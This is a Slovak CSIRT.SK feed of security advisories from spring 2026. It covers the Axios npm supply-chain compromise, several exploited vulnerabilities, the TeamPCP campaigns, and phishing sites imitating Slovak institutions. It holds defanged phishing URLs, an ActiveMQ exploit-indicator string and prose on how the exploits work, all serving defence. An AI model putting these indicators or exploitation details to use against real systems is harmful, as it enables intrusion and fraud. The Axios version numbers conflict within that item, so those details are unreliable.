CSIRT.SK

Útok na dodávateľský reťazec cez NPM knižnicu Axios

Marian Danko — Fri, 10 Apr 2026 15:09:44 +0000

V období od 31. marca do 7. apríla 2026 bol zaznamenaný sofistikovanýútok na dodávateľský reťazec zameraný na populárny npm balík Axios. Útok je pripisovaný severokórejskej skupine UNC1069, ktorá kompromitovala účet správcu balíka a publikovala škodlivé verzie knižnice. Útočníci použili verzie 1.14.0 a 0.30.3 Axios, v ktorých pridali škodlivú závislosť plain-crypto-js do súboru package.json.

Falošná závislosť po inštalácii automaticky nasadzovala malvér typu Remote Access Trojan (RAT), ktorý umožňoval útočníkom vzdialený prístup k napadnutým systémom a exfiltráciu citlivých údajov.

Napriek krátkemu trvaniu incidentu predstavuje tento útok vysoké riziko vzhľadom na masové využitie knižnice Axios.

Časová os útoku

30.3.2026 – Príprava

Do registri NPM bola pridaná knižnica plain-crypto-js@4.2.0, ktorá obsahovala funkcionalitu pre nasadenie malvéru RAT. O niekoľko hodín bola publikovaná jej nová verzia plain-crypto-js@4.2.1. Do knižnice Axios ju pridali ako falošnú závislosť, ktorá imituje legitímnu crypto-js@4.2.0.

31.3.2026 – Začiatok incidentu

Útočníci získali prístup k účtu udržiavateľa jasonsaayman na platforme NPM a publikovali škodlivé verzie knižnice Axios 1.14.1 a 0.30.4. Inštaláciou podvrhnutých verzií došlo k nasadeniu malvéru RAT, funkčného na operačných systémoch macOS, Windows aj Linux. Knižnice boli dostupné na NPM iba niekoľko hodín.

2.4.2026 – Atribúcia

Tím Google Threat Intelligence Group atribuoval útok severekórejskej skupine UNC1069. Skupinu prezradil malvér identifikovaný ako WAVESHAPER.V2, tvoriaci zadné vrátka, ktorý útočníci nasadili s pomocou falošnej závislosti plain-crypto-js. Tiež použili rovnakého poskytovateľa pripojenia ASN a uzol služby AstrillVPN, ktoré v minulosti využil tím UNC1069.

Odporúčania:

Bezodkladne vymeňte infikované verzie knižnice Axios (1.14.1 a 0.30.4) za bezpečné verzie.
Overte prítomnosť závislosti plain-crypto-js v spojitosti s knižnicou Axios vo vašej infraštruktúre a odstráňte ju z priečinka node_modules. Závislosť plain-crypto-js nie je legitímnou súčasťou žiadnej verzie Axios.
Overte prítomnosť indikátorov kompromitácie vo Vašej infraštruktúre (tu a tu).
Vykonajte audit svojej CI/CD infraštruktúry.
Pravidlo YARA pre detekciu hrozby nájdete tu.

Zdroje:

Zraniteľné smerovače spoločnosti TP-Link môžu umožniť zneužitie DNS a odcudzenie prístupových údajov

alexander.valach — Thu, 09 Apr 2026 16:01:38 +0000

Upozorňujeme organizácie, aby preverili, či sa pri vzdialenom prístupe do interných systémov nepoužívajú zraniteľné alebo nepodporované smerovače SOHO. Podľa varovania FBI a partnerov útočníci zneužívali kompromitované smerovače na zmenu DHCP a DNS nastavení, čím presmerovali DNS dopyty na vlastné prekladače a následne vedeli cielene podvrhnúť odpovede pre vybrané služby. Takto mohli zachytávať prihlasovacie údaje, tokeny a ďalšie citlivé údaje, najmä ak používateľ pokračoval aj po upozornení na chybu certifikátu. Medzi zneužívané zariadenia patrili aj smerovače TP-Link obsahujúce zraniteľnosť CVE-2023-50224.

IC3 vo varovaní neuvádza jeden konkrétny model, iba všeobecne „smerovače TP-Link zraniteľné na CVE-2023-50224“. Výrobca TP-Link následne spresnil, že ide o viaceré staršie modely po ukončení podpory, pričom medzi explicitne uvádzané patria napríklad TL-WR841N / TL-WR841ND a Archer C7. V novšom bezpečnostnom oznámení TP-Link sú medzi dotknutými zariadeniami uvedené aj ďalšie zastarané (angl. legacy) modely, napríklad TL-MR6400, Archer C5, TL-WDR3600, TL-WDR4300, TL-WR740N, TL-WR741ND, TL-WR840N, TL-WR941ND, TL-WA801ND a TL-WA901ND.

Dopad na Slovensko:

Riziko je relevantné najmä pre organizácie, ktorých zamestnanci pristupujú k e-mailu, VPN alebo interným webovým aplikáciám z domácich alebo malých kancelárskych sietí. Pri tomto type útoku nemusí byť prvým prejavom kompromitácie malvér na stanici, ale zmena sieťových parametrov na okraji siete, preto je dôležité pozerať sa na DNS a DHCP ako na detekčné body.

Odporúčania:

Pokiaľ organizácia používa na vstup do danej siete predsa len modely obsahujúce danú zraniteľnosť, odporúčame z pohľadu bezpečnostného monitoringu sledovať anomálie v DNS premávke. Prakticky to znamená overiť, či stanice neposielajú DNS požiadavky na iné IP adresy, než povoľuje politika organizácie (organizácia využíva konkrétne DNS servery), či sa neobjavili nové externé prekladače (angl. resolver), alebo či sa nemení smer DNS komunikácie po pripojení používateľa z domácej siete prostredníctvom daného zariadenia. Tento prístup je primeraný práve preto, že podstatou útoku je práve zmena DNS servera za DNS server útočníka.

Odporúčame tiež cielene preveriť varovania na certifikáty pri prihlásení do webmailu, VPN portálov a interných webových aplikácií. IC3 konkrétne uvádza, že podvodné DNS odpovede boli používané aj pre Microsoft Outlook Web Access a že útok bol účinný vtedy, keď používateľ pokračoval aj napriek chybnému certifikátu. Preto je potrebné v prípade výskytu zariadenia korelovať výskyt premávky DNS s chybami v rámci certifikátov.

Ak chce organizácia tento problém preveriť rýchlo, mala by začať tromi krokmi:

Najprv zistiť, či vzdialení používatelia alebo pobočky nepoužívajú zraniteľné modely TP-Link a iné nepodporované SOHO smerovače.
Potom overiť, aké DNS nastavenia dostávajú klienti cez DHCP.
Skontrolovať v logoch firewallu, DNS alebo EDR, či sa neobjavila komunikácia na neautorizované DNS servery alebo zvýšený výskyt upozornení pri zmene certifikátoch pri prístupe k firemným službám.

Ak sa takáto odchýlka potvrdí, je vhodné dotknutý smerovač považovať za kompromitovaný alebo minimálne nedôveryhodný a ďalej preveriť jeho konfiguráciu a incident nahlásiť svojej jednotke CSIRT.

Zdroje:

https://nvd.nist.gov/vuln/detail/cve-2023-50224

https://www.cisa.gov/news-events/alerts/2025/09/03/cisa-adds-two-known-exploited-vulnerabilities-catalog

https://www.ic3.gov/PSA/2026/PSA260407

https://www.tp-link.com/us/support/faq/5058/

https://www.tp-link.com/us/support/faq/4365/

Zraniteľnosť Apache ActiveMQ Classic umožňuje vykonávanie kódu

Marian Danko — Thu, 09 Apr 2026 14:16:34 +0000

Vývojári opravili vysoko závažnú zraniteľnosť v open-source serveri Apache ActiveMQ Classic, ktorá umožňuje vzdialené vykonávanie kódu. Chyba sa v serveri nachádzala 13 rokov.

Zraniteľné systémy:

Apache ActiveMQ / Broker, verzie staršie ako 5.19.4
Apache ActiveMQ / Broker, verzie 6.x.x staršie ako 6.2.3

Opis činnosti:

CVE-2026-34197 (CVSS skóre 8,8)

Populárny server pre message brokering, Apache ActiveMQ Classic, obsahuje 13 rokov starú zraniteľnosť, ktorá po úspešnom zneužití umožňuje vzdialenému útočníkovi s nízkymi oprávneniami vykonávať ľubovoľné príkazy operačného systému.

Chyba vyplýva z neošetrenej kooperácie medzi nezávisle vyvíjanými komponentmi. Rozhranie API komponentu Jolokia je dostupné z webovej manažmentovej konzoly (Jetty web server). To umožňuje v rámci funkcie BrokerService.addNetworkConnector nahrávať konfiguráciu z externých zdrojov. Autentifikovaný útočník môže vďaka tomu vytvoriť špeciálnu požiadavku s využitím parametru brokerConfig protokolu VM a nahrať súbor Spring XML. Vzhľadom na to, že funkcia Spring ResourceXmlApplicationContext iniciuje jeho obsah ešte pred kontrolou konfigurácie, ktorú vykonáva súčasť BrokerService, vzniká priestor kde je možné vykonať ľubovoľný kód.

Verzie Apache ActiveMQ Classic 6.0.0 až 6.1.1 zvyšujú nebezpečenstvo zneužitia, pretože obsahujú zraniteľnosť CVE-2024-32114. Jej zreťazením s CVE-2026-34197 môže útočník obísť potrebu autentifikácie.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Apache ActiveMQ a Apache ActiveMQ Broker aspoň na verziu 5.19.4 alebo 6.2.3.

Pre overenie prítomnosti pokusov o zneužitie zraniteľnosti preverte v broker logu podozrivé spojenia, ktoré využívajú protokol VM (vm://) a dopytový parameter „brokerConfig=xbean:http://“.

Odkazy:

Zraniteľnosť Docker Engine umožňuje obísť kontrolu autorizácie

Marian Danko — Thu, 09 Apr 2026 14:13:12 +0000

Vývojári Docker Engine opravili vysoko závažnú zraniteľnosť modulov AuthZ, ktorá dovoľuje útočníkom obchádzať kontroly autorizácie a vytvárať napríklad privilegované kontajnery.

Zraniteľné systémy:

Docker Engine, verzie staršie ako 29.3.1

Opis činnosti:

CVE-2026-34040 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť Docker Engine umožňuje obchádzať autorizačné moduly AuthZ, ktoré vykonávajú rozhodnutia na základe inšpekcie tela požiadavky API. Chybu zabezpečenia je možné zneužiť zaslaním špeciálne vytvorenej požiadavky s dostatočne veľkým telom (nad 1MB). Middleware AuthZ ju pošle na kontrolu autentifikačnému modulu AuthZ kvôli spôsobu narábania s nadrozmernými požiadavkami bez tela. Ten ju následne povolí, pretože neobsahuje žiaden nepovolený prvok. Celá požiadavka aj s telom následne smeruje z middleware na Docker daemon, ktorý ju prečíta a vykoná.

Útočník tak môže napríklad vytvárať privilegované kontajnery, aj keď je taká možnosť v rámci infraštruktúry zakázaná.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia Docker Engine aspoň na verziu 29.3.1.

Pokiaľ aktualizácia nie je možná, zraniteľnosť môžete mitigovať obmedzením prístupu k Docker API len z dôveryhodných zdrojov. Môžete tiež prestať používať moduly AuthZ, ktoré rozhodujú na základe inšpekcie tela požiadavky. Ďalšie kontroly a opatrenia vykonajte podľa informácií tu.

Odkazy:

Phishingová kampaň zameraná na imitovanie webových formulárov VšZP

Marian Danko — Thu, 09 Apr 2026 08:53:42 +0000

Internetom sa opakovane šíri phishingová kampaň zameraná na imitovanie webových formulárov VšZP (Všeobecná zdravotná poisťovňa). Podvodníci rozposielajú e-maily s informáciou o údajnom vrátení peňazí. Súčasťou správy je aj odkaz vedúci na podvrhnutú stránku, ktorá sa vydáva za web zdravotnej poisťovne.

Podozrivé stránky :

hxxps://ralsinternationaltrade[.]com/next
hxxps://qubestores[.]com/uploads/home/pages/step-one[.]php
hxxps://stracetech[.]com/images
hxxps://epobocka-vszp[.]ebnak-kh[.]com/home

Vzhľadom na dynamický charakter phishingových kampaní, pri ktorých dochádza k častej zmene podvodných webových stránok, nie je postačujúce orientovať sa výlučne podľa konkrétnych príkladov uvedených vo varovaniach.

Hlavné znaky, na základe ktorých je webová stránka považovaná za podozrivú, zahŕňajú najmä vizuálne spracovanie napodobňujúce dizajn legitímnych služieb VšZP. Stránka sa snaží vzbudiť dôveryhodnosť u používateľa zahrňujúc dôveryhodné farebné prevedenie a odkazy, v spojení s hlásením prostredníctvom mailovej komunikácie.

Venujte preto zvýšenú pozornosť adrese webovej stránky (URL) pred prihlásením sa, či zadaním osobných alebo platobných údajov a pri komunikácii s poisťovňou využívajte výhradne oficiálne kontaktné kanály.

Ak narazíte na podozrivý web, neposkytujte žiadne údaje a nahláste udalosť na incident@csirt.sk.

Po zadaní požadovaných informácií pre vyplatenie preplatku z poistného Vás web presmeruje na stránku, kde je potrebné zadať bankové údaje, na ktoré bude sľúbený preplatok vyplatený.

Následne web imituje správanie štandardnej platobnej brány, kedy sa pokúša vytvoriť spojenie s bankovým subjektom, ako aj overenie pomocou „druhého faktora“.

Po „overení“ bankového spojenia web požaduje ešte zadanie dodatočného bezpečnostného faktora.

Ďalšie (neaktívne) weby

Nižšie prikladáme zoznam ďalších webov, ktoré obsahovali rovnaký phishingový obsah, avšak už sú neaktívne:

hxxp://vszp-obnova[.]com/

hxxp://infosk-vszp[.]com/

hxxps://vakafetzi[.]sites[.]sch[.]gr/wordpress/wp/slovakia/index.php

hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE9FzyYkLWqndch2du4m_AURIUhaqBUeQk75dg4nItKVJN5_OuR0yEVSS_AkXq6N79cQ=

hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE7c7MfUCI1wuZDtROWuh70uV6sRtK2Zo1TLn2pQqFYr5w83cvs0OZ5x7d1twW7HkG3M=

hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE37piY4CqW4MeryeKyFxV1WmjrHFWjFQNg05IVkyhYQbEgsmvyHaz3teMsG_rPl1J2E=

hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE_rrzmIXDMqWJBOAVsXgUgzCZGuZJnnirEXe2iGpZFoY1XMahkBxegT2Iy3LbDWSUys=

hxxps://www[.]faduae[.]com/vs-mext

hxxps://canaldirecto[.]com/next

hxxps://chaingapp[.]com/coredeux/

hxxps://uk5aside[.]com/web/home/pages/step-one.php

hxxps://kvn.reality[.]com/app1/pages/step-one.php

hxxps://canaldirecto[.]com/beta

hxxps://cassardi[.]com/app-login/pages/step-one.php

hxxps://mefaticaret[.]com/cookie

hxxps://madenacarspareparts[.]com/plugins/home/pages/step-one.php

Aktívne zneužívaná kritická zraniteľnosť modulu WordPress Ninja Forms – File Uploads

Marian Danko — Wed, 08 Apr 2026 14:48:24 +0000

Vývojári populárneho modulu pre WordPress, Ninja Forms – File Uploads, vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. Jej zneužitie umožňuje nahrávanie ľubovoľných súborov na server.

Zraniteľné systémy:

Ninja Forms – File Uploads vo verziách 3.3.26 a starších

Opis zraniteľností:

CVE-2026-0740 (CVSS skóre 9,8)

Kritická zraniteľnosť modulu Ninja Forms – File Uploads pre WordPress spočíva v absencii overovania súborových typov a prípon cieľových názvov súborov vo funkcii NF_FU_AJAX_Controllers_Uploads::handle_upload. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na nahratie ľubovoľných súborov na webserver. Funkcia neoveruje v rámci názvov súborov ani súborové cesty, teda útočník dokáže nahrať súbor aj do iného priečinku, ako na to určeného. To umožňuje napríklad nahrať PHP skripty do koreňového priečinku a vykonávať ich.

Predmetná zraniteľnosť je aktívne zneužívaná.

Možné škody:

Vzdialené vykonávanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Bezodkladná aktualizácia modulu Ninja Forms – File Uploads aspoň na verziu 3.3.27. Odporúčame tiež vykonať kontrolu integrity súborového systému webstránky.

Zdroje:

Fortinet opravila zneužívanú kritickú zraniteľnosť FortiClientEMS

Marian Danko — Tue, 07 Apr 2026 08:29:35 +0000

Spoločnosť Fortinet opravila kritickú aktívne zneužívanú zraniteľnosť svojho produktu FortiClientEMS, ktorá umožňuje obísť autentifikáciu a vzdialene vykonávať kód.

Zraniteľné systémy:

FortiClientEMS 7.4.5 – 7.4.6

Opis činnosti:

CVE-2026-35616 (CVSS skóre 9,8)

Kritická zraniteľnosť FortiClientEMS súvisí s nedostatočnou kontrolou prístupov. Vzdialený neautentifikovaný útočník ju môže zneužiť na obídenie API autentifikácie a vykonanie kódu alebo príkazov pomocou špeciálne vytvorených požiadaviek.

Spoločnosť Fortinet sa vyjadrila, že zraniteľnosť je aktívne zneužívaná. Americká agentúra CISA ju zaradila do svojho katalógu zneužívaných zraniteľností KEV.

Možné škody:

Obídenie bezpečnostných prvkov
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia aspoň na verziu FortiClientEMS 7.4.7. Alternatívne môžete nainštalovať hotfix podľa postupu pre zraniteľnú verziu 7.4.5 a 7.4.6.

Odkazy:

Skupina TeamPCP kompromituje populárne softvérové balíky a produkty

Marian Danko — Thu, 02 Apr 2026 10:46:27 +0000

Popis hrozby:

Skupina TeamPCP vedie niekoľkofázovú, eskalujúcu kampaň zameranú na kompromitáciu softvérového dodávateľského reťazca. Útočníci zneužívajú dôveryhodné distribučné kanály (PyPI, GitHub, NPM, Docker Hub) a kompromitujú populárne nástroje a knižnice (Trivy, KICS, LiteLLM, Telnyx), čím obchádzajú tradičné bezpečnostné mechanizmy.

Cieľom skupiny je distribúcia malvéru, ktorý následne umožňuje krádež prihlasovacích údajov, kompromitáciu prostredí CI/CD a krádež kryptomien. V niektorých prípadoch vykonáva aj deštruktívne útoky, aktuálne zamerané proti Iránu.

Kampane skupiny TeamPCP predstavujú vysoké riziko pre organizácie využívajúce open-source nástroje a knižnice.

Kampane:

Kampaň proti Docker API, Kubernetes, REDIS React Server (december 2025): Skupina TeamPCP viedla v decembri 2025 kampaň, v ktorej zneužívala nedostatočne zabezpečené Docker API, klastre Kubernetes, dashboardy RAY, servery REDIS a zraniteľnosť React2Shell (CVE-2025-55182) nástroja React Server Components na vytváranie škodlivej infraštruktúry. Kompromitované uzly boli zneužívané na široké spektrum škodlivých aktivít vrátane zapojenia do proxy sietí, skenovania a ďalšieho šírenia, ťažby kryptomien, exfiltráciu citlivých údajov, nasadenie ransomvéru a následné vydieranie obetí. Skupina exfiltrované dáta zverejňovala na svojom telegramovom kanáli.
Trivy – útok na dodávateľský reťazec (marec 2026): Skupina kompromitovala populárny bezpečnostný nástroj na skenovanie zraniteľností Trivy. Útočníci zneužili chybu v GitHub Actions workflow (konkrétne pull_request_target), cez ktorú získali privilegovaný token GitHub (PAT). Následne prevzali kontrolu nad repozitárom, mazali vydania a publikovali škodlivé rozšírenie VS Code obsahujúce infostealer. Útok bol súčasťou širšej automatizovanej kampane hackerbot-claw, ktorá skenovala tisíce projektov na zraniteľné konfigurácie CI/CD. Kampaň prebiehala aj v marci 2026, kedy skupina rozšírila útok na dodávateľský reťazec cez infikované inštancie Trivy publikované na Docker Hub.
Checkmarx KICS – útok na dodávateľský reťazec (marec 2026): TeamPCP kompromitovala bezpečnostný skenovací nástroj KICS spoločnosti Checkmarx pre GitHub Action, prostredníctvom ktorého následne šírila infostealer.
Knižnice PyPI – útok na dodávateľský reťazec (marec 2026): Skupina infikovala knižnice Telnyx a LiteLLM distribuované nástrojom PyPI pre programovací jazyk Python škodlivým kódom, ktorý vytvára v infikovaných systémoch zadné vrátka a kradne prihlasovacie údaje a iné citlivé údaje. Exfiltrované dáta ukryla v audio súboroch.
CanisterWorm a deštruktívna kampaň voči Iránu (marec 2026): Skupina vykonávala útoky na dodávateľský reťazec v rámci kampani nesúcej podobné znaky, ako kampaň šíriaca infostealer CanisterWorm. Tento malvér napríklad využíva rovnaký ICP kanister pre C2. Nová kampaň sa zameriava na odhaľovanie iránskych systémov. Malvér na základe časovej zóny a locale cieľový systém klastrov Kubernetes buď infikuje malvérom CanisterWorm a vytvorí zadné vrátka, alebo v prípade indikácie, že sa jedná o iránsky systém, pristúpi k deštruktívnemu mazaniu klastrov Kubernetes.
Krádež zdrojového kódu spoločnosti Cisco (marec 2026): Spoločnosť Cisco zasiahol kybernetický incident, keď viacero útočných skupín zneužilo ukradnuté prihlasovacie údaje získané v rámci kampane kompromitujúcej nástroj Trivy. Prenikli do jej interného vývojového prostredia, kde pomocou škodlivého modulu GitHub Actions získali prístup ku prostrediam CI/CD. Odtiaľ odcudzili zdrojový kód a AWS kľúče firmy aj jej zákazníkov. Útočníci skopírovali stovky repozitárov. Incident zasiahol viacero zariadení vrátane vývojárskych staníc spoločnosti. Cisco izolovala zasiahnuté systémy a začala rotovať prihlasovacie údaje.
Útok na cloudové účty AWS Európskej komisie (marec 2025): jednotka CERT‑EU informovala, že útočníci zo skupiny TeamPCP zneužili kompromitovaný API kľúč na prístup ku cloudovým účtom v službe Amazon AWS patriacim Európskej komisii, ktorý získali pravdepodobne v rámci kampane proti Trivy. Ukradli desiatky gigabajtov dát obsahujúcich mená, e‑mailové adresy a ďalšie súbory a ovplyvnili údaje minimálne 30 ďalších subjektov EÚ, ktoré používajú rovnakú infraštruktúru. Časť ukradnutých dát sa objavila online a CERT‑EU pokračuje vo vyšetrovaní, analýze a notifikácii dotknutých organizácií.

Dopad na Slovensko:

Vzhľadom na obľúbenosť kompromitovaných knižníc a nástrojov medzi vývojármi sa malvér šírený v rámci kampane skupiny TeamPCP mohol rozšíriť aj do produktov a repozitárov slovenských softvérových developerov, resp. ich zákazníkov.

Odporúčania:

Ak používate nástroj Trivy vo verzii 0.69.4, 0.69.5 alebo 0.69.6, Trivy-action s tagom 0.34.2 alebo starším a Setup-trivy verzie nižšej ako 0.2.6, vymeňte verziu na Trivy 0.69.3, Trivy-action na 0.35.0 a Setup-trivy na 0.2.6, alebo novšiu nekompromitovanú verziu. Preverte tiež prítomnosť indikátorov kompromitácie.
Ak používate skener Chceckmarx KICS (kics-github-action) verzie 1.1, zmeňte používanú verziu. Preverte tiež prítomnosť indikátorov kompromitácie.
Ak používate knižnicu Telnyx verzie 4.87.1 alebo 4.87.2, aktualizujte na vyššiu verziu, alebo vykonajte downgrade na verziu 4.87.0. Preverte tiež prítomnosť indikátorov kompromitácie.
Ak používate knižnicu LiteLLM vo verziách 1.82.7 alebo 1.82.8, aktualizujte na vyššiu verziu, alebo vykonajte downgrade na verziu 1.82.6. Návod na mitigáciu hrozby a indikátory kompromitácie nájdete tu.
Ak využívate infraštruktúru Kubernetes, preverte prítomnosť indikátorov kompromitácie kampane CanisterWorm.

Venujte pozornosť aj spôsobu, akým váš kód definuje používané verzie knižníc. Ak napríklad používate „un/pinned“ verzie v requirements.txt, skontrolujte, či sú striktne definované len overené verzie bez kompromitácie.
Odrotujte relačné tokeny a API kľúče.

Zdroje:

Mesačný prehľad kritických zraniteľností marec 2026

Marian Danko — Thu, 02 Apr 2026 08:50:54 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2026.

Mesačný prehľad – 03/2026 PDF (675 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Nová phishingová kampaň imituje služby štátnych inštitúcií. Podvodníci lepia aj nálepky na autá. [aktualizované]

Marian Danko — Mon, 30 Mar 2026 11:16:40 +0000

VJ CSIRT získala informácie o nových podvodných webstránkach, ktoré sa snažia napodobniť vzhľad a funkcie oficiálnych elektronických služieb štátu.
Ide o novú phishingovú / smishingovú kampaň, ktorá sa môže v nasledujúcich dňoch objavovať plošne.

Útočníci používajú dôveryhodne vyzerajúce domény, platené certifikáty, aj funkčné odkazy na skutočné informácie a služby, čím sa snažia zvýšiť dôveryhodnosť falošných stránok a zvýšiť tak šancu vylákania osobných údajov, prihlasovacích údajov alebo platobných informácií, či priamo podvodom docieliť prevod finančných prostriedkov.

Ku dňu 30.03.2026 evidujeme nahlásenia súvisiace s predmetnou kampaňou vo forme zatiaľ dvoch identifikovaných webových stránok

platbymvsr[.]sk
platby-mvsr[.]sk

„platby-mvsr[.]sk“ stránka napodobňujúca Ministerstvo vnútra SR a dopravný inšpektorát (umožňujúca „úhradu pokút“)

„sk-slovensko[.]web[.]app“ falošná prihlasovacia stránka tváriaca sa ako slovensko.sk (ide o historickú phishingovú stránku, ktorá je stále nahlasovaná)

Kampaň sa podľa dostupných informácií šíri tak, že občania si na zaparkovaných motorových vozidlách nachádzajú nálepky alebo letáky, ktoré ich upozorňujú na potencionálne spáchanie priestupku proti bezpečnosti a plynulosti cestnej premávky.

Naskenovaním QR kódu je obeť presmerovaná na jednu z vyššie uvedených škodlivých stránok, kde sa od neho vyžaduje vyplnenie osobných údajov a následne verifikácia cez SMS. V ďalšom kroku sa zobrazí požiadavka uhradiť pokutu za údajný priestupok.

Nálepky a letáky, ktoré nechávajú aktéri kampane na motorových vozidlách

Podvodná stránka otvorená cez mobilný telefón

Venujte preto zvýšenú pozornosť adrese webovej stránky (URL) pred prihlásením sa, či zadaním osobných alebo platobných údajov. Oficiálne vládne portály sa vždy nachádzajú na doménach:

.gov.sk
.minv.sk
.slovensko.sk

Ak narazíte na podozrivý web, neposkytujte žiadne údaje a nahláste udalosť na incident@csirt.sk.

Zraniteľnosť WordPress Smart Slider 3 umožňuje krádež dát

Marian Danko — Mon, 30 Mar 2026 11:16:33 +0000

Bezpečnostní výskumníci upozornili na kritickú zraniteľnosť v doplnku Smart Slider 3 pre WordPress, ktorý je aktívny na viac ako 800 000 webových stránkach. Zraniteľnosť umožňuje akémukoľvek autentifikovanému používateľovi vrátane úrovne subscriber čítať ľubovoľné súbory na serveri.

Zraniteľné systémy:

WordPress Smart Slider 3, verzia 3.5.1.33 a staršie

Opis činnosti:

CVE-2026-3098 (CVSS skóre 6,5)

Zraniteľnosť sa nachádza vo funkcii actionExportAll(), ktorá súvisí s exportom súborov. Funkcia nekontroluje formát a zdroj vyžiadaného súboru. To umožňuje akémukoľvek autentifikovanému používateľovi vrátane úrovne subscriber prečítať ľubovoľné súbory na serveri, vrátane citlivých dát vo wp‑config.php.

Možné škody:

Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia modulu Smart Slider 3 aspoň na verziu 3.5.1.34.

Odkazy:

Útočníci zneužívajú kritickú zraniteľnosť F5 BIG-IP APM

Marian Danko — Mon, 30 Mar 2026 11:13:02 +0000

Spoločnosť F5 opravila kritickú chybu zabezpečenia na zariadeniach BIG-IP APM, ktorá môže viesť ku vykonaniu kódu na diaľku za nešpecifikovaných podmienok.

Zraniteľné systémy:

BIG-IP APM 15.1.0 – 15.1.10
BIG-IP APM 16.1.0 – 16.1.6
BIG-IP APM 17.1.0 – 17.1.2
BIG-IP APM 17.5.0 – 17.5.1

Opis činnosti:

CVE-2025-53521 (CVSS 4.0 skóre 9,3)

Americká organizácia CISA pridala do katalógu aktívne zneužívaných zraniteľností kritickú chybu zabezpečenia v produkte F5 BIG-IP APM, ktorá umožňuje vzdialené vykonávanie kódu. Chyba sa nachádza v procese apmd na dátovej úrovni, keď prístupová politika nakonfigurovaná na virtuálnom serveri. Zneužiť ju môže neautentifikovaný útočník pomocou nešpecifikovanej škodlivej premávky.

Spoločnosť F5 v marci 2026 prekategorizovala pôvodnú zraniteľnosť z DDoS na RCE a zvýšila jej závažnosť.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia BIG-IP APM aspoň na verziu 17.5.1.3, 17.1.3, 16.1.6.1 alebo 15.1.10.8.

Odkazy:

Kritické zraniteľnosti Citrix NetScaler ADC a Gateway

Marian Danko — Tue, 24 Mar 2026 16:24:49 +0000

Spoločnosť Citrix na základe interných kontrol objavila a opravila kritickú zraniteľnosť produktov Citrix NetScaler ADC a Gateway, ktorá umožňuje čítanie pamäte mimo povolené hodnoty. Zároveň opravila vysoko závažnú zraniteľnosť vedúcu ku zámene relácií používateľov.

Zraniteľné systémy:

NetScaler ADC a NetScaler Gateway 14.1 verzie staršie ako 14.1-66.59
NetScaler ADC a NetScaler Gateway 13.1 verzie staršie ako 13.1-62.23
NetScaler ADC FIPS a NDcPP verzie staršie ako 13.1-37.262

Opis činnosti:

CVE-2026-3055 (CVSS skóre 9,3)

Kritická zraniteľnosť v Citrix NetScaler ADC a NetScaler Gateway vzniká, pokiaľ je zariadenie nakonfigurované ako SAML IDP. Vyplýva z nedostatočného overovania vstupov. Vzdialený neautorizovaný útočník získa jej zneužitím možnosť čítať pamäť zraniteľného zariadenia mimo povolené hodnoty.

CVE-2026-4368 (CVSS skóre 7,7)

Vysoko závažná zraniteľnosť v Citrix NetScaler ADC a NetScaler Gateway vzniká, pokiaľ je zariadenie nakonfigurované ako Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) alebo virtuálny AAA server. Vyplýva zo súbehu procesov. Vzdialený útočník s nízkymi oprávneniami môže jej zneužitím spôsobiť zámenu používateľských relácií.

Možné škody:

Únik citlivých informácií
Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia aspoň na verzie

NetScaler ADC a NetScaler Gateway 14.1-66.59
NetScaler ADC a NetScaler Gateway 13.1-62.23
NetScaler ADC FIPS a NDcPP 13.1-37.262

Cloudové inštancie výrobca opravil automaticky a nie je pre ne potrebné vykonať ďalšie kroky.

Pre overenie, či máte zariadenie nakonfigurované ako SAML IDP, vyhľadajte v NetScaler Configuration reťazec „add authentication samlIdPProfile .*“.

Pre overenie, či máte zariadenie nakonfigurované ako virtuálny AAA server, vyhľadajte v NetScaler Configuration reťazec „add authentication vserver .*“.

Pre overenie, či máte zariadenie nakonfigurované ako Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy), vyhľadajte v NetScaler Configuration reťazec „add vpn vserver .*“.

Odkazy:

Mesačná správa CSIRT.SK – február 2026

Marian Danko — Fri, 20 Mar 2026 13:52:29 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2026. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 02/2026 PDF (1 747 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritická zraniteľnosť ScreenConnect umožňuje prístup k reláciám

Marian Danko — Thu, 19 Mar 2026 12:34:57 +0000

Spoločnosť ConnectWise opravila kritickú zraniteľnosť v produkte ScreenConnect, ktorá umožňuje útočníkom získať prístup ku kryptografickému materiálu inštancie, a spolu s ním k aktívnym reláciám. Útočník môže tiež získať zvýšené oprávnenia. Spoločnosť pozorovala pokusy o zneužitie zraniteľnosti.

Zraniteľné systémy:

ScreenConnect, verzie staršie ako 26.1

Opis činnosti:

CVE-2026-3564 (CVSS skóre 9,0)

Aplikácia ScreenConnect obsahuje kritickú zraniteľnosť, ktorá umožňuje vzdialenému neautorizovanému útočníkovi získať prístup ku autentifikačnému kryptografickému materiálnu inštancie (kľúče ASP.NET) a s vyššími oprávneniami získať tak prístup k aktívnym reláciám.

Kryptografické kľúče ukladala aplikácia ku konfiguračným súborom servera. Po aktualizácii sú uložené v šifrovanom úložisku. Spoločnosť ConnectWise zaviedla tiež možnosť obmeniť kryptografický materiál na vyžiadanie administrátora inštancie.

